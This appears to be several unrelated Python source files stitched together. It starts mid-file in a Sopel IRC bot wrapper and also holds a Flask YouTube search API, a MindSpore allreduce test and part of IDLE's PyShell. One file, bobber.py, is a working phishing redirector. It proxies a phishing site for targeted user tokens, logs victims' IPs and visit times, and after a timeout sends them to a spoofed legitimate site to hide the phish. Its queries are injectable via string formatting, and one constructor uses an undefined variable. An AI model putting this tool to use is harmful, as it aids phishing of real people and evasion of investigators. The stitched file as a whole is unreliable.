:param str trailing: string that should always appear at the end of
``message`` (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
For more details about the optional arguments to this wrapper
method, consult the documentation for :meth:`sopel.bot.Sopel.say`.
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages, truncation, trailing)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
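# A minimal sketch of a plugin callable that receives a ``SopelWrapper`` as its
# ``bot`` argument (hedged example: the decorator comes from ``sopel.plugin``,
# and the command name ``ping`` is arbitrary):
#
#     from sopel import plugin
#
#     @plugin.commands('ping')
#     def ping(bot, trigger):
#         # ``bot`` is a SopelWrapper: say()/reply() default to trigger.sender
#         bot.reply('pong')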
|
bobber.py
|
#!/usr/bin/env python3
import sys
from datetime import datetime
import time
from flask import Flask
from flask import request,Response
import requests
import urllib
from urllib.parse import urljoin
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from bs4 import BeautifulSoup, SoupStrainer
import threading
import base64
app = Flask(__name__)
tokens = []
token = 1
TIMESTAMP = datetime.now().strftime("%d.%m.%y-%H-%M-%S")
############################
# CHANGE THESE VARIABLES
############################
# Path to file containing target user tokens/IDs (one per line)
TOKENS = "/path/to/tokens/file"
############################
# This should be the URL for this server - make sure they line up with
# any settings defined in the app.run() function at the bottom of this
# file
REDIRECT_DOMAIN = "https://my.flask.app:8443"
############################
# This should be the URL where your phishing app is hosted
PHISHAPP_DOMAIN = "https://my.app.url"
############################
# This site will be used when an invalid request is made,
# or if the user is locked out by accessing the server.
#
# This should be a valid URL to a site with legitimate content.
SPOOFED_DOMAIN = "https://some.other.content.com"
############################
# This should be what the app uses to identify a user token on landing
# eg if the url is https://myapp.com?userguid=1234 then use "userguid"
TOKEN_DELIMITER = "CHANGEME"
############################
# This is the value of time (in seconds) the user should be able to
# access the phishing app before getting redirected
TIMEOUT_LENGTH = 900
############################
# Update this file if you want to reuse a generated bobber DB
# otherwise, a new one will be generated at restart
#
# To stop using auto-generated files, do the below
#
# Comment the top line to stop automatically generating a DB
# Fill out the BOBBER_LOCATION variable and uncomment the last 2 lines
BOBBER_DB = ("sqlite:///bobber.%s.db" % (TIMESTAMP))
#BOBBER_LOCATION = "/path/to/file/bobber.db"
#BOBBER_DB = ("sqlite:///%s" % (BOBBER_LOCATION))
############################
# END CHANGES AFTER HERE
############################
# List of users who have accessed the app
# but shouldn't be locked out yet
INTERMEDIATE_ACCESS_LIST = []
engine = create_engine(BOBBER_DB,echo=False)
def dbinit():
#Gather tokens
f_token = open(TOKENS,"r")
line = f_token.readline()
while line:
tokens.append(line.rstrip())
line = f_token.readline()
f_token.close()
#Create db file
Base = declarative_base()
class Tokens(Base):
__tablename__ = 'tracker'
id = Column(Integer, primary_key=True)
userToken = Column(String)
hasAccessed = Column(Integer)
timeAccessed = Column(String)
sourceIP = Column(String)
def __init__(self, userToken, hasAccessed, timeAccessed):
self.userToken = userToken
self.hasAccessed = hasAccessed
self.timeAccessed = timeAccessed
self.sourceIP = sourceIP
Base.metadata.create_all(engine)
#Populate the database with user tokens
c = engine.connect()
t = c.begin()
for token in range(0,len(tokens)):
ins = 'INSERT INTO "tracker" (userToken,hasAccessed,timeAccessed,sourceIP) VALUES ("%s",0,"Not Accessed","0.0.0.0")' % (tokens[token])
c.execute(ins)
t.commit()
c.close()
def remove_access(userID):
if(userID in INTERMEDIATE_ACCESS_LIST):
sys.exit(0)
INTERMEDIATE_ACCESS_LIST.append(userID)
time.sleep(TIMEOUT_LENGTH)
INTERMEDIATE_ACCESS_LIST.remove(userID)
c = engine.connect()
t = c.begin()
lockout = c.execute('UPDATE tracker set hasAccessed=1 WHERE userToken="%s"' % (userID))
t.commit()
c.close()
def accessed(userID, sourceIP):
if(userID == False):
return 0
if userID in tokens:
c = engine.connect()
t = c.begin()
result = c.execute('SELECT "hasAccessed" FROM tracker WHERE "userToken" = "%s"' % (userID))
result = result.fetchone()
accessTimestamp = c.execute('UPDATE tracker SET timeAccessed="%s" where userToken="%s"' % (datetime.now().strftime("%d.%m.%y-%H-%M-%S"), userID))
source = c.execute('UPDATE tracker SET sourceIP="%s" where userToken="%s"' % (sourceIP, userID))
t.commit()
c.close()
if(result["hasAccessed"] == 0):
block = threading.Thread(target=remove_access, args=(userID,))
block.start()
return result["hasAccessed"]
return 1
def process_content(request, DOMAIN, **kwargs):
#Assign default values if not specified
try:
gargs = kwargs["gargs"]
except:
gargs = ""
try:
pargs = kwargs["pargs"]
except:
pargs = {}
try:
path = kwargs["path"]
except:
path = ""
if(request.method=="GET"):
#Go fetch the content of the specified domain
resp = requests.get(("%s/%s%s" % (DOMAIN,path,gargs)))
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection']
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
elif(request.method=="POST"):
resp = requests.post(("%s/%s%s" % (DOMAIN,path,gargs)), data=pargs)
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection']
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
#Replace all links to route through the flask app
soup = BeautifulSoup(response.data, "html.parser")
for url in soup.find_all('a'):
try:
if(url.get('href')[0] == "/"):
if(DOMAIN == PHISHAPP_DOMAIN):
url["href"] = ("%s%s" % (urljoin(REDIRECT_DOMAIN,url.get('href')),gargs))
else:
url["href"] = urljoin(REDIRECT_DOMAIN,url.get('href'))
except:
pass
for img in soup.find_all('img'):
try:
if(img.get('src')[0] == "/"):
imgex = str(img.get("src")[-3:])
ib64 = base64.b64encode(urllib.request.urlopen(urljoin(DOMAIN,img.get('src'))).read())
img["src"] = ("data:img/%s; base64,%s" % (imgex,ib64.decode("utf-8")))
except:
pass
for l in soup.find_all('link'):
try:
if(l.get('href')[0] == "/"):
l["href"] = urljoin(REDIRECT_DOMAIN,l.get('href'))
except:
pass
for s in soup.find_all('script'):
try:
if(s.get('src')[0] == "/"):
s["src"] = urljoin(REDIRECT_DOMAIN,s.get("src"))
continue
s = str(s).replace('src=\"/',('src=\"%s/\"' % (REDIRECT_DOMAIN)))
except Exception as e:
pass
for f in soup.find_all('form'):
try:
if(f.get('action')[0] == "/"):
f["action"] = urljoin(REDIRECT_DOMAIN,"%s%s" % (f.get("action"),gargs))
except:
pass
response.data = soup.prettify()
return response
#If the base url is requested
@app.route('/')
def index():
#Default fail
token = False
PHISHAPP_DELIM = False
#Grab the user ID from the end of the URL if it's there
try:
token = request.args[TOKEN_DELIMITER]
#If it's not there, move on
except Exception as e:
pass
if(TOKEN_DELIMITER in request.args):
PHISHAPP_DELIM = True
#If this is their first time accessing the site
if((not accessed(token,request.environ.get('HTTP_X_REAL_IP', request.remote_addr))) and PHISHAPP_DELIM):
gargs=""
if request.method=='GET':
#Gather GET arguments
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
#If not passing GET parameters
return process_content(request,PHISHAPP_DOMAIN,gargs=gargs)
#If requested via POST
elif request.method=='POST':
#Gather the POST arguments
pargs = {}
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
else:
gargs=("?%s=%s" % (TOKEN_DELIMITER, token))
for i in request.values:
pargs.update({ i : request.values[i]})
return process_content(request, PHISHAPP_DOMAIN,pargs=pargs,gargs=gargs)
else:
gargs=""
if request.method=='GET':
#Gather GET arguments
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
return process_content(request,SPOOFED_DOMAIN,gargs=gargs)
elif request.method=='POST':
#Gather the POST arguments
pargs = {}
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
else:
gargs=("?%s=%s" % (TOKEN_DELIMITER, token))
for i in request.values:
pargs.update({ i : request.values[i]})
return process_content(request, SPOOFED_DOMAIN,pargs=pargs,gargs=gargs)
#If specific urls are requested
@app.route('/<path:path>',methods=['GET','POST'])
def proxy(path):
#Default fail
token = False
PHISHAPP_DELIM = False
#Grab the user ID from the end of the URL if it's there
try:
token = request.args[TOKEN_DELIMITER]
#If it's not there, move on
except Exception as e:
pass
if(TOKEN_DELIMITER in request.args):
PHISHAPP_DELIM = True
#If there's no get args, it's likely not for the phishing app anymore
if(len(request.args) == 0) and (request.method == "GET"):
return process_content(request,SPOOFED_DOMAIN,path=path)
#If this is their first time visiting
if((not accessed(token,request.environ.get('HTTP_X_REAL_IP', request.remote_addr))) and PHISHAPP_DELIM):
#If requested via GET
gargs=""
if request.method=='GET':
#Gather GET arguments
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
return process_content(request, PHISHAPP_DOMAIN, path=path, gargs=gargs)
#If requested via POST
elif request.method=='POST':
#Gather the POST arguments
pargs = {}
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
else:
gargs=("?%s=%s" % (TOKEN_DELIMITER, token))
for i in request.values:
pargs.update({ i : request.values[i]})
return process_content(request, PHISHAPP_DOMAIN, path=path,pargs=pargs,gargs=gargs)
else:
#If this is not their first time visiting, or if the token is invalid
gargs = ""
#If requested via GET
if request.method=='GET':
if(len(request.args) >= 1):
gargs="?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
#Go fetch the content of the spoofed domain
return process_content(request, SPOOFED_DOMAIN, path=path, gargs=gargs)
elif request.method=='POST':
args = {}
for i in request.values:
args.update({ i : request.values[i]})
#Go fetch the content of the spoofed domain
return process_content(request, SPOOFED_DOMAIN, path=path, gargs=gargs, pargs=args)
if __name__ == '__main__':
dbinit()
app.run(host="0.0.0.0", port="5000")
|
newer.py
|
from flask import Flask , request, jsonify
import requests
import time
import threading
import json
from youtube import Search,SearchMore,GetSong
def repeat():
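    # Keep-alive loop: ping the Heroku app every 3 minutes so the free dyno
    # does not idle out while the API sits unused.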
while True:
time.sleep(180)
print(requests.get('https://gray-server.herokuapp.com/').text)
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'GrayHat : gray-hat.me'
@app.route('/search',methods=['POST'])
def search():
search = ''
try:
req_data = request.get_json()
search = req_data['search']
except:
return {'error' : 'search compulsory'}
try:
sess = req_data['sessionToken']
tok = req_data['continuation']
click = req_data['clickTrackingParams']
ob2 = SearchMore(sess,tok,click,search)
ob2.compute()
v2 = ob2.prepare()
return jsonify(v2)
except:
ob = Search(search)
ob.compute()
v2 = ob.prepare()
return jsonify(v2)
@app.route('/song',methods=['POST'])
def getSong():
req_data = request.get_json()
ytid = req_data['id']
return jsonify(GetSong(ytid).getSong())
if __name__ == '__main__':
t1 = threading.Thread(target=repeat)
t1.start()
app.run()
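# Example client calls against a local instance (hedged sketch: assumes the
# server is running on Flask's default port 5000, and '<video id>' is a
# placeholder for a real YouTube video id):
#
#     import requests
#     first_page = requests.post('http://127.0.0.1:5000/search',
#                                json={'search': 'lofi'}).json()
#     # Subsequent pages also pass 'sessionToken', 'continuation' and
#     # 'clickTrackingParams' taken from the previous response, as read in
#     # search() above.
#     song = requests.post('http://127.0.0.1:5000/song',
#                          json={'id': '<video id>'}).json()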
|
test_pynative_hccl_allreduce.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test hccl allreduce performance with 8p"""
import os
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import dtype as mstype
from mindspore.ops import operations as P
import mindspore.communication.management as D
from mindspore import context
from mindspore.context import ParallelMode
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
np.random.seed(1)
os.environ['GLOG_v'] = str(2)
class AllReduceNet(nn.Cell):
def __init__(self):
super(AllReduceNet, self).__init__()
self.mul = P.Mul()
self.all_reduce = P.AllReduce()
self.add = P.Add()
def construct(self, x):
x = self.mul(x, 2)
y1 = Tensor(np.array([[2, 2, 2, 2], [2, 2, 2, 2], [2, 2, 2, 2]])).astype(np.float32)
z = self.add(x, y1)
z = self.all_reduce(z)
y2 = Tensor(np.array([[-16, -16, -16, -16], [-16, -16, -16, -16], [-16, -16, -16, -16]])).astype(np.float32)
out = self.add(z, y2)
out = self.all_reduce(out)
out = self.mul(out, 2)
return out
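# Expected value check: each device computes ones * 2 + 2 = 4; the first
# AllReduce (sum over 8 devices) gives 32; adding -16 gives 16; the second
# AllReduce gives 128; the final * 2 yields 256, matching expect_output in
# test_pynative_hccl_allreduce_8p below.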
def train_allreduce_8p(q, device_id, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", device_id=device_id)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=False,
device_num=device_num)
net = AllReduceNet()
input_x = np.ones([3, 4]).astype(np.float32)
output = net(Tensor(input_x, mstype.float32))
q.put(output)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_pynative_hccl_allreduce_8p():
device_num = 8
process = []
q = Queue()
for i in range(device_num):
device_id = i
process.append(Process(target=train_allreduce_8p, args=(q, device_id, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
# check result
for i in range(device_num):
expect_output = [[256, 256, 256, 256], [256, 256, 256, 256], [256, 256, 256, 256]]
output = Tensor(q.get())
assert np.allclose(output.asnumpy(), expect_output)
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
|
PyShell.py
|
#! /usr/bin/env python
from __future__ import print_function
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import io
import linecache
from code import InteractiveInterpreter
from platform import python_version, system
try:
from Tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
from idlelib import IOBinding
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
import warnings
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way."""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n" % (category.__name__, message)
return s
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, IOError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath,"r") as old_file:
lines = old_file.readlines()
except IOError:
lines = []
try:
with open(self.breakpointPath,"w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except IOError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
